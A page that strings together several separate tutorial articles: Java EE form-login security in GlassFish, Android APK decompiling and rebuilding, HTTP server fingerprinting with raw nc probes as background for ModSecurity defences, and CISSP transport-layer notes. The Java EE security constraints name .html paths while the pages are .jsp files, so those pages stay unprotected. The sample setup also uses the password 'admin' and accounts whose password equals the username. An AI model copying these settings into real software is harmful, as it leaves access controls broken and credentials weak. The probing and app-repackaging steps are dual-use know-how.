
Developing Secure Java EE Applications in GlassFish

Packt
31 May 2010
14 min read
In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In the course of the article, we will cover the following topics:

- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure Business layer using EJBs
- Developing a secure Presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying a security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container

Read Designing Secure Java EE Applications in GlassFish here.

Developing the Presentation layer

The Presentation layer is the layer closest to end users when we develop applications that are meant to be used by humans instead of other applications. In our application, the Presentation layer is a Java EE web application consisting of the elements listed below. The JSP files are grouped into different directories to make the security description easier.

- index.jsp: The application entry point. It has links to functional JSP pages like toMilli.jsp and so on.
- auth/login.html: Presents a custom login page to users when they try to access a restricted resource. This file is placed inside the auth directory of the web application.
- auth/logout.jsp: Logs users out of the system after their work is finished.
- auth/loginError.html: Unsuccessful login attempts redirect users to this page. This file is placed inside the auth directory of the web application.
- jsp/toInch.jsp: Converts a given length to inches; it is only available to managers.
- jsp/toMilli.jsp: Converts a given length to millimeters; this page is available to any employee.
- jsp/toCenti.jsp: Converts a given length to centimeters; this functionality is available to everyone.
- Converter servlet: Receives the request, invokes the session bean to perform the conversion, and returns the value to the user.
- auth/accessRestricted.html: An error page for HTTP error 401, which occurs when authorization fails.
- Deployment descriptors: The files in which we describe the security constraints over the resources we want to protect.

Now that our application's building blocks are identified, we can start implementing them to complete the application. Before anything else, let's implement the JSP files that provide the conversion GUI. The directory layout and content of the Web module is shown in the following figure:

Implementing the Conversion GUI

In our application we have an index.jsp file that acts as a gateway to the entire system, shown in the following listing:

```html
<html>
<head><title>Select A conversion</title></head>
<body><h1>Select A conversion</h1>
<a href="auth/login.html">Login</a> <br/>
<a href="jsp/toCenti.jsp">Convert Meter to Centimeter</a> <br/>
<a href="jsp/toInch.jsp">Convert Meter to Inch</a> <br/>
<a href="jsp/toMilli.jsp">Convert to Millimeter</a><br/>
<a href="auth/logout.jsp">Logout</a>
</body>
</html>
```

Implementing the Converter servlet

The Converter servlet receives the conversion value and method from the JSP files and calls the corresponding method of a session bean to perform the actual conversion.
The following listing shows the Converter servlet's content:

```java
@WebServlet(name="Converter", urlPatterns={"/Converter"})
public class Converter extends HttpServlet {
    @EJB
    private ConversionLocal conversionBean;

    protected void processRequest(HttpServletRequest request,
            HttpServletResponse response)
            throws ServletException, IOException {
    }

    @Override
    protected void doPost(HttpServletRequest request,
            HttpServletResponse response)
            throws ServletException, IOException {
        System.out.println("POST");
        response.setContentType("text/html;charset=UTF-8");
        PrintWriter out = response.getWriter();
        try {
            int valueToconvert =
                Integer.parseInt(request.getParameter("meterValue"));
            String method = request.getParameter("method");
            out.print("<hr/> <center><h2>Conversion Result is: ");
            if (method.equalsIgnoreCase("toMilli")) {
                out.print(conversionBean.toMilimeter(valueToconvert));
            } else if (method.equalsIgnoreCase("toCenti")) {
                out.print(conversionBean.toCentimeter(valueToconvert));
            } else if (method.equalsIgnoreCase("toInch")) {
                out.print(conversionBean.toInch(valueToconvert));
            }
            out.print("</h2></center>");
        } catch (AccessLocalException ale) {
            response.sendError(401);
        } finally {
            out.close();
        }
    }
}
```

Starting from the beginning, we use annotations to configure the servlet mapping and servlet name instead of using the deployment descriptor. Then we use dependency injection to inject an instance of the Conversion session bean into the servlet, and decide which of its methods to invoke based on the conversion type that the calling JSP sends as a parameter. Finally, we catch javax.ejb.AccessLocalException and send an HTTP 401 error back to inform the client that it does not have the required privileges to perform the requested action. The following figure shows what the result of an invocation could look like:

Each servlet needs some description elements, supplied either in the deployment descriptor or as annotations acting as deployment descriptor elements.
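The Conversion session bean invoked by the servlet is not listed in this excerpt. Purely as an illustration of the arithmetic the servlet delegates to, here is a minimal sketch: the class and method names mirror the calls made in the servlet, but the plain static methods, return types, and the 39.37 inches-per-meter factor are assumptions; the real bean would be an EJB carrying security annotations.

```java
// Hypothetical sketch of the Conversion bean's arithmetic only.
// The real class would be a @Stateless EJB with method-level security.
public class Conversion {

    // 1 meter = 1000 millimeters
    public static int toMilimeter(int meters) {
        return meters * 1000;
    }

    // 1 meter = 100 centimeters
    public static int toCentimeter(int meters) {
        return meters * 100;
    }

    // 1 meter = 39.37 inches (assumed conversion factor)
    public static double toInch(int meters) {
        return meters * 39.37;
    }

    public static void main(String[] args) {
        System.out.println(toMilimeter(2));  // 2000
        System.out.println(toCentimeter(2)); // 200
        System.out.println(toInch(2));       // 78.74
    }
}
```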
Implementing the conversion JSP files is the last step in implementing the functional pieces. The following listing shows the content of the toMilli.jsp file:

```html
<html>
<head><title>Convert To Millimeter</title></head>
<body><h1>Convert To Millimeter</h1>
<form method=POST action="../Converter">Enter Value to Convert:
<input name=meterValue>
<input type="hidden" name="method" value="toMilli">
<input type="submit" value="Submit" />
</form>
</body>
</html>
```

The toCenti.jsp and toInch.jsp files look the same except for the descriptive content and the value of the hidden parameter, which is toCenti and toInch respectively. Now we are finished with the functional parts of the Web layer; we just need to implement the GUI required for the security measures.

Implementing the authentication frontend

For authentication, we should use a custom login page to keep a unified look and feel across the entire web frontend of our application. We can use a custom login page with the FORM authentication method. To implement the FORM authentication method we need to implement a login page and an error page to which users are redirected in case authentication fails. Implementing authentication requires us to go through the following steps:

- Implementing login.html and loginError.html
- Including the security description in web.xml and sun-web.xml or sun-application.xml

Implementing a login page

In FORM authentication we implement our own login form to collect the username and password, and we then pass them to the container for authentication. We should let the container know which field is the username and which is the password by using standard names for these fields: the username field is j_username and the password field is j_password. To pass these fields to the container for authentication, we should use j_security_check as the form action.
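To illustrate what the container receives when the form is submitted, the following sketch builds the URL-encoded body a browser would post to j_security_check. The field names j_username and j_password are the standard ones described above; the helper class and the sample credentials are made up for illustration.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;

// Builds the application/x-www-form-urlencoded body that the login form
// posts to j_security_check; the container, not our code, consumes it.
public class LoginForm {

    public static String securityCheckBody(String username, String password)
            throws UnsupportedEncodingException {
        return "j_username=" + URLEncoder.encode(username, "UTF-8")
             + "&j_password=" + URLEncoder.encode(password, "UTF-8");
    }

    public static void main(String[] args) throws Exception {
        // Placeholder credentials, for illustration only
        System.out.println(securityCheckBody("james", "secret&1"));
        // -> j_username=james&j_password=secret%261
    }
}
```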
When we post to j_security_check, the servlet container takes over and authenticates the included j_username and j_password against the configured realm. The listing below shows the login.html content:

```html
<form method="POST" action="j_security_check">
  Username: <input type="text" name="j_username"><br />
  Password: <input type="password" name="j_password"><br />
  <br />
  <input type="submit" value="Login">
  <input type="reset" value="Reset">
</form>
```

The following figure shows the login page, which is displayed when an unauthenticated user tries to access a restricted resource:

Implementing a logout page

A user may need to log out of our system after they're finished using it, so we need to implement a logout page. The following listing shows the logout.jsp file:

```jsp
<% session.invalidate(); %>
<body>
<center>
<h1>Logout</h1>
You have successfully logged out.
</center>
</body>
```

Implementing a login error page

Now we should implement loginError.html, an authentication error page that informs users of an authentication failure:

```html
<html>
<body>
<h2>A Login Error Occurred</h2>
Please click <a href="login.html">here</a> for another try.
</body>
</html>
```

Implementing an access restricted page

When an authenticated user without the required privileges tries to invoke a session bean method, the EJB container throws a javax.ejb.AccessLocalException. To show a meaningful error page to our users, we should either map this exception to an error page, or catch the exception, log the event for auditing purposes, and then use the sendError() method of the HttpServletResponse object to send out an error code. We will map the HTTP error code to our custom web pages with meaningful descriptions using the web.xml deployment descriptor. You will see which configuration elements we use to do the mapping. The following snippet shows the AccessRestricted.html file:

```html
<body>
<center>
<p>You need to login to access the requested resource.
To login go to <a href="auth/login.html">Login Page</a></p>
</center>
</body>
```

Configuring deployment descriptors

So far we have implemented the files required for FORM-based authentication; we only need to include the required descriptions in the web.xml file. Looking back at the application requirement definitions, anyone can use the meter-to-centimeter conversion, while every other piece of functionality requires the user to log in. We use three different pages for the different types of conversion. We do not need any constraint on the centimeter conversion page, so we do not include any definition for it. Per the application description, any employee can access the toMilli.jsp page. The security constraint for this page is defined in the following listing:

```xml
<security-constraint>
  <display-name>You should be an employee</display-name>
  <web-resource-collection>
    <web-resource-name>all</web-resource-name>
    <description/>
    <url-pattern>/jsp/toMillimeter.html</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
    <http-method>DELETE</http-method>
  </web-resource-collection>
  <auth-constraint>
    <description/>
    <role-name>employee_role</role-name>
  </auth-constraint>
</security-constraint>
```

We should constrain the toInch.jsp page so that only managers can access it. The listing below shows the security constraint definition for this page:

```xml
<security-constraint>
  <display-name>You should be a manager</display-name>
  <web-resource-collection>
    <web-resource-name>Inch</web-resource-name>
    <description/>
    <url-pattern>/jsp/toInch.html</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <auth-constraint>
    <description/>
    <role-name>manager_role</role-name>
  </auth-constraint>
</security-constraint>
```

Finally, we need to define every role we used in the deployment descriptor. The following snippet shows how we define these roles in the web.xml file:
```xml
<security-role>
  <description/>
  <role-name>manager_role</role-name>
</security-role>
<security-role>
  <description/>
  <role-name>employee_role</role-name>
</security-role>
```

Looking back at the application requirements, we need to define a data constraint to ensure that the usernames and passwords provided by our users are safe during transmission. The following listing shows how we can define this data constraint on the login.html page:

```xml
<security-constraint>
  <display-name>Login page Protection</display-name>
  <web-resource-collection>
    <web-resource-name>Authentication</web-resource-name>
    <description/>
    <url-pattern>/auth/login.html</url-pattern>
    <http-method>GET</http-method>
    <http-method>POST</http-method>
  </web-resource-collection>
  <user-data-constraint>
    <description/>
    <transport-guarantee>CONFIDENTIAL</transport-guarantee>
  </user-data-constraint>
</security-constraint>
```

One more step and our web.xml file will be complete. In this step we define an error page for the HTTP 401 error code. This error code means that the application server is unable to perform the requested action due to a negative authorization result. The following snippet shows the elements required to define this error page:

```xml
<error-page>
  <error-code>401</error-code>
  <location>AccessRestricted.html</location>
</error-page>
```

Now that we are finished declaring the security, we can create the conversion pages, and after creating them we can start on the Business layer and its security requirements.

Specifying the security realm

Up to this point we have defined all the constraints that our application requires, but we still need one more step to complete the application's security configuration. The last step is specifying the security realm and authentication method. We should specify FORM authentication and, per the application description, authentication must happen against the company-wide LDAP server. Here we are going to use the LDAP security realm LDAPRealm.
We need to import a new LDIF file into our LDAP server, containing the group and user definitions required for this article. To import the file we can use the following command, assuming that you have downloaded the source code bundle from https://www.packtpub.com//sites/default/files/downloads/9386_Code.zip and extracted it:

```
import-ldif --ldifFile path/to/chapter03/users.ldif --backendID userRoot --clearBackend --hostname 127.0.0.1 --port 4444 --bindDN cn=gf cn=admin --bindPassword admin --trustAll --noPropertiesFile
```

The users and groups defined inside the users.ldif file are:

- james/james: member of manager and employee
- meera/meera: member of employee

We used OpenDS for the realm data storage, and it has two users, one in the employee group and the other one in the manager group as well. To configure the authentication realm we need to include the following snippet in the web.xml file:

```xml
<login-config>
  <auth-method>FORM</auth-method>
  <realm-name>LDAPRealm</realm-name>
  <form-login-config>
    <form-login-page>/auth/login.html</form-login-page>
    <form-error-page>/auth/loginError.html</form-error-page>
  </form-login-config>
</login-config>
```

If we treat our Web and EJB modules as separate modules, we must specify the role mappings for each module separately using the GlassFish deployment descriptors, sun-web.xml and sun-ejb-jar.xml. But we are going to bundle our modules as an Enterprise Application Archive (EAR) file, so we can use the GlassFish deployment descriptor for enterprise applications to define the role mapping in one place and let all modules use those definitions. The following listing shows the role and group mappings in the sun-application.xml file:
```xml
<sun-application>
  <security-role-mapping>
    <role-name>manager_role</role-name>
    <group-name>manager</group-name>
  </security-role-mapping>
  <security-role-mapping>
    <role-name>employee_role</role-name>
    <group-name>employee</group-name>
  </security-role-mapping>
  <realm>LDAPRealm</realm>
</sun-application>
```

The security-role-mapping element we used in sun-application.xml has the same schema as the security-role-mapping element of the sun-web.xml and sun-ejb-jar.xml files. You may have noticed that we have a realm element in addition to the role mapping elements. We can use the realm element of sun-application.xml to specify the default authentication realm for the entire application instead of specifying it for each module separately.

Summary

In this article series, we covered the following topics:

- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure Business layer using EJBs
- Developing a secure Presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying a security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container

We learnt how to develop a secure Java EE application with all standard modules, including Web, EJB, and application client modules.
Reversing Android Applications

Packt
20 Mar 2014
8 min read
Android application teardown

An Android application is an archive file of the data and resource files created while developing the application. The extension of an Android application is .apk, meaning application package, which in most cases includes the following files and folders:

- classes.dex (file)
- AndroidManifest.xml (file)
- META-INF (folder)
- resources.arsc (file)
- res (folder)
- assets (folder)
- lib (folder)

In order to verify this, we could simply unzip the application using any archive manager application, such as 7zip, WinRAR, or any preferred application. On Linux or Mac, we could simply use the unzip command to show the contents of the archive package, as shown in the following screenshot:

Here, we have used the -l (list) flag to simply show the contents of the archive package instead of extracting it. We could also use the file command to check whether it is a valid archive package.

An Android application consists of various components, which together create the working application. These components are Activities, Services, Broadcast Receivers, Content Providers, and Shared Preferences. Before proceeding, let's have a quick walkthrough of what these different components are all about:

- Activities: These are the visual screens that a user can interact with. They may include buttons, images, TextViews, or any other visual component.
- Services: These are the Android components that run in the background and carry out specific tasks specified by the developer. These tasks may include anything from downloading a file over HTTP to playing music in the background.
- Broadcast Receivers: These are the receivers in an Android application that listen for incoming broadcast messages from the Android system or from other applications on the device. Once they receive a broadcast message, a particular action can be triggered depending on predefined conditions.
The conditions could range from receiving an SMS or an incoming phone call to a change in the power supply, and so on.
- Shared Preferences: These are used by an application to save small sets of data. This data is stored inside a folder named shared_prefs. These small datasets may include name-value pairs such as the user's score in a game and login credentials. Storing sensitive information in shared preferences is not recommended, as it may then be vulnerable to data stealing and leakage.
- Intents: These are the components used to bind two or more different Android components together. Intents can be used to perform a variety of tasks, such as starting an action, switching activities, and starting services.
- Content Providers: These are used to provide access to a structured set of data to be used by the application. An application can access and query its own data, or the data stored on the phone, using Content Providers.

Now that we know the Android application internals and what an application is composed of, we can move on to reversing an Android application - that is, getting the readable source code and other data sources when we just have the .apk file with us.

Reversing an Android application

As we discussed earlier, Android applications are simply an archive file of data and resources. Even so, we can't simply unzip the archive package (.apk) and get readable sources. For these scenarios, we have to rely on tools that convert the byte code (as in classes.dex) into readable source code. One approach to converting the bytecode to readable files is a tool called dex2jar. The .dex file is Java bytecode converted to Dalvik bytecode, optimized and made efficient for mobile platforms. This free tool simply converts the .dex file present in the Android application to a corresponding .jar file. Please follow the ensuing steps. First, download the dex2jar tool from https://code.google.com/p/dex2jar/.
Now we can run it against our application's .dex file and convert it to the .jar format. All we need to do is go to the command prompt, navigate to the folder where dex2jar is located, run the d2j-dex2jar.bat file (on Windows) or the d2j-dex2jar.sh file (on Linux/Mac), and provide the application name and path as the argument. As the argument, we can simply use the .apk file, or we can even unzip the .apk file and then pass the classes.dex file instead, as shown in the following screenshot:

As we can see in the preceding screenshot, dex2jar has successfully converted the .dex file of the application to a .jar file named helloworld-dex2jar.jar. Now, we can simply open this .jar file in any graphical Java viewer such as JD-GUI, which can be downloaded from its official website at http://jd.benow.ca/.

Once we have downloaded and installed JD-GUI, we can go ahead and open it. It will look like the one shown in the following screenshot:

Here, we can open up the converted .jar file from the earlier step and see all the Java source code in JD-GUI. To open a .jar file, we simply navigate to File | Open. In the right-hand pane, we can see the Java sources and all the methods of the Android application.

Note that the decompilation process will give you an approximate version of the original Java source code. This won't matter in most cases; however, in some cases, you might see that some of the code is missing from the converted .jar file. Also, if the application developer is using protections against decompilation such as ProGuard, then when we decompile the application using dex2jar or Apktool, we won't see the exact source code; instead, we will see a bunch of different source files, which won't be an exact representation of the original source code.

Using Apktool to reverse an Android application

Another way of reversing an Android application is converting the .dex file to smali files.
A smali file is a file format whose syntax is similar to a language known as Jasmin. We won't be going in depth into the smali file format for now; for more information, take a look at the online wiki at https://code.google.com/p/smali/wiki/ to get an in-depth understanding of smali.

Once we have downloaded Apktool and configured it, we are all set to go further. The main advantage of Apktool over JD-GUI is that it is bidirectional. This means that if you decompile an application, modify it, and then recompile it back using Apktool, it will recompile perfectly and generate a new .apk file. dex2jar and JD-GUI can't do the same, as they give approximate code rather than the exact code.

To decompile an application using Apktool, all we need to do is pass the .apk filename to the Apktool binary. Once decompiled, Apktool will create a new folder with the application name in which all of the files will be stored. To decompile, we simply go ahead and use apktool d [app-name].apk. Here, the d flag stands for decompilation. In the following screenshot, we can see an app being decompiled using Apktool:

Now, if we go inside the smali folder, we will see a bunch of different smali files, which contain the code of the Java classes that were written while developing the application. Here, we can also open up a file, change the values, and use Apktool to build it back again. To build a modified application from smali, we use the b (build) flag in Apktool:

apktool b [decompiled folder name] [target-app-name].apk

However, in order to decompile, modify, and recompile applications, I would personally recommend using another tool called Virtuous Ten Studio (VTS). This tool offers functionality similar to Apktool, with the only difference being that VTS presents it in a nice graphical interface, which is relatively easy to use.
The only limitation of this tool is that it runs natively only in a Windows environment. We can go ahead and download VTS from the official download link, http://www.virtuous-ten-studio.com/. The following is a screenshot of the application decompiling the same project:

Summary

In this article, we covered some of the methods and techniques that are used to reverse Android applications.
Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending them so difficult. Here are just a few examples of where things can go wrong and allow a vulnerability to be exploited:

- The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, which have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted.
- The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file.
- Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities.
- Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data.

HTTP fingerprinting

Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and the software running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play.
We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to identify him or her, for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner, by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system. More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on your viewpoint, this can be useful to a network administrator for identifying which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker, since it allows him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools:

- httprint: One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD.
- httprecon: A newer tool, first released in 2007 and still in active development. Runs on Windows.

Let's first run httprecon against a standard Apache 2.2 server:

And now let's run httprint against the same server and see what happens:

As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server!
You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/.

Tip: If you get the error message Fingerprinting Error: Host/URL not found when running httprint, try specifying the IP address of the server instead of the hostname.

The fact that both tools are able to identify the server should come as no surprise, as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will look at how fingerprinting tools distinguish different web servers, and see whether we can fool them into thinking the server is running a different brand of web server software.

How HTTP fingerprinting works

There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones.

Server banner

The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner:

```apache
# Change the server banner to MyServer 1.0
ServerTokens Full
SecServerSignature "MyServer 1.0"
```

Response header

The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges.
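A toy version of the header-order check can be scripted. Given the raw header block of a response, the sketch below extracts the field names in order, the sequence a fingerprinting tool would compare against its database. The sample headers are invented for illustration, not captured from a real server.

```java
import java.util.ArrayList;
import java.util.List;

// Extracts the header-field order from a raw HTTP response -- one of the
// signals fingerprinting tools compare across server implementations.
public class HeaderOrder {

    public static List<String> fieldOrder(String rawResponse) {
        List<String> order = new ArrayList<>();
        String[] lines = rawResponse.split("\r\n");
        for (int i = 1; i < lines.length; i++) { // skip the status line
            if (lines[i].isEmpty()) break;       // blank line ends the headers
            int colon = lines[i].indexOf(':');
            if (colon > 0) order.add(lines[i].substring(0, colon));
        }
        return order;
    }

    public static void main(String[] args) {
        String apacheLike = "HTTP/1.1 200 OK\r\nDate: ...\r\n"
            + "Server: Apache\r\nContent-Type: text/html\r\n\r\n";
        System.out.println(fieldOrder(apacheLike)); // [Date, Server, Content-Type]
    }
}
```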
HTTP protocol responses

Another way to gain information about a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server.

Issuing an HTTP DELETE request

The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number the server will use for the response page. Here is a DELETE request issued to our Apache server:

```
$ nc bytelayer.com 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Date: Mon, 27 Apr 2009 09:10:49 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 303
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method DELETE is not allowed for the URL /index.html.</p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>
```

As we can see, the server returned a 405 - Method Not Allowed error. The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL /index.html.
Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net:

$ nc www.iis.net 80
DELETE / HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 27 Apr 2009 09:22:34 GMT
Connection: close
Content-Length: 1293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>405 - HTTP verb used to access this page is not allowed.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>405 - HTTP verb used to access this page is not allowed.</h2>
<h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>
</fieldset></div>
</div>
</body>
</html>

The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0.
(We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site, we can be pretty sure that they are indeed running their own web server software.) The response generated by IIS carries the same HTTP error code, 405; however, there are many subtle differences in the way the response is generated. Here are just a few:

- IIS uses spaces between method names in the comma-separated list for the Allow field, whereas Apache does not
- The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field
- IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body

Bad HTTP version numbers

A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued:

$ nc bytelayer.com 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Date: Mon, 27 Apr 2009 09:36:10 GMT
Server: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2
Content-Length: 295
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br /></p>
<hr>
<address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address>
</body></html>

There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand.
Now let's see what IIS does:

$ nc www.iis.net 80
GET / HTTP/5.0

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 27 Apr 2009 09:38:37 GMT
Connection: close
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Hostname</h2>
<hr><p>HTTP Error 400. The request hostname is invalid.</p>
</BODY></HTML>

We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol version would also require this header to be sent, and the error message reflects this fact.
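Taken together, the characteristic error phrases quoted in these transcripts can drive a crude fingerprinting heuristic. A minimal sketch follows; the phrase-to-server mapping simply reuses the responses shown in this article and is by no means exhaustive:

```python
# Sketch: classify a server by characteristic error-message wording.
# The phrases below are taken verbatim from the responses shown above;
# a real fingerprinting tool would use a much larger signature set.
PHRASES = {
    "The requested method DELETE is not allowed": "Apache",
    "Your browser sent a request that this server could not understand": "Apache",
    "invalid method (HTTP verb) was used": "IIS",
    "The request hostname is invalid": "IIS",
}

def classify_body(body: str) -> str:
    """Match the response body against known error phrases."""
    for phrase, server in PHRASES.items():
        if phrase in body:
            return server
    return "unknown"
```

This is exactly why serving custom error pages (as discussed elsewhere in this chapter's context) helps defeat fingerprinting: it removes the stock phrases such heuristics depend on.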
Packt
28 Oct 2009
5 min read

Telecommunications and Network Security Concepts for CISSP Exam

Transport layer

The transport layer in the TCP/IP model does two things: it packages the data given out by applications into a format that is suitable for transport over the network, and it unpacks the data received from the network into a format suitable for applications. The process of packaging the data packets received from the applications is known as encapsulation, and the output of such a process is known as a datagram. Similarly, the process of unpacking the datagram received from the network is known as abstraction. A transport section in a protocol stack carries the information in the form of datagrams, frames, and bits.

Transport layer protocols

There are many transport layer protocols that carry out the transport layer functions. The most important ones are:

Transmission Control Protocol (TCP): It is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol.

User Datagram Protocol (UDP): This protocol is similar to TCP, but is connectionless.

A connection-oriented protocol is a protocol that guarantees delivery of datagrams (packets) to the destination application by way of a suitable mechanism - for example, the three-way handshake (syn, syn-ack, ack) in TCP. The reliability of datagram delivery of such a protocol is high. A protocol that does not guarantee the delivery of datagrams, or packets, to the destination is known as a connectionless protocol. These protocols use only one-way communication, and the speed of datagram delivery by such protocols is high.

Other transport layer protocols are as follows:

Sequenced Packet eXchange (SPX): SPX is a part of the IPX/SPX protocol suite and is used in the Novell NetWare operating system. While Internetwork Packet eXchange (IPX) is a network layer protocol, SPX is a transport layer protocol.
Stream Control Transmission Protocol (SCTP): It is a connection-oriented protocol similar to TCP, but it provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in Unix-like operating systems.

Appletalk Transaction Protocol (ATP): It is a proprietary protocol developed for Apple Macintosh computers.

Datagram Congestion Control Protocol (DCCP): As the name implies, it is a transport layer protocol used for congestion control. Applications include Internet telephony and video or audio streaming over the network.

Fiber Channel Protocol (FCP): This protocol is used in high-speed networking such as Gigabit networking. One of its prominent applications is the Storage Area Network (SAN). A SAN is a network architecture used for attaching remote storage devices such as tape drives, disk arrays, and so on to a local server. This facilitates the use of storage devices as if they were local devices.

In the following sections we'll review the most important protocols: TCP and UDP.

Transmission Control Protocol (TCP)

TCP is a connection-oriented protocol that is widely used in Internet communications. As the name implies, the protocol has two primary functions. The primary function of TCP is the transmission of datagrams between applications, while the secondary function is related to the controls that are necessary for ensuring reliable transmissions.

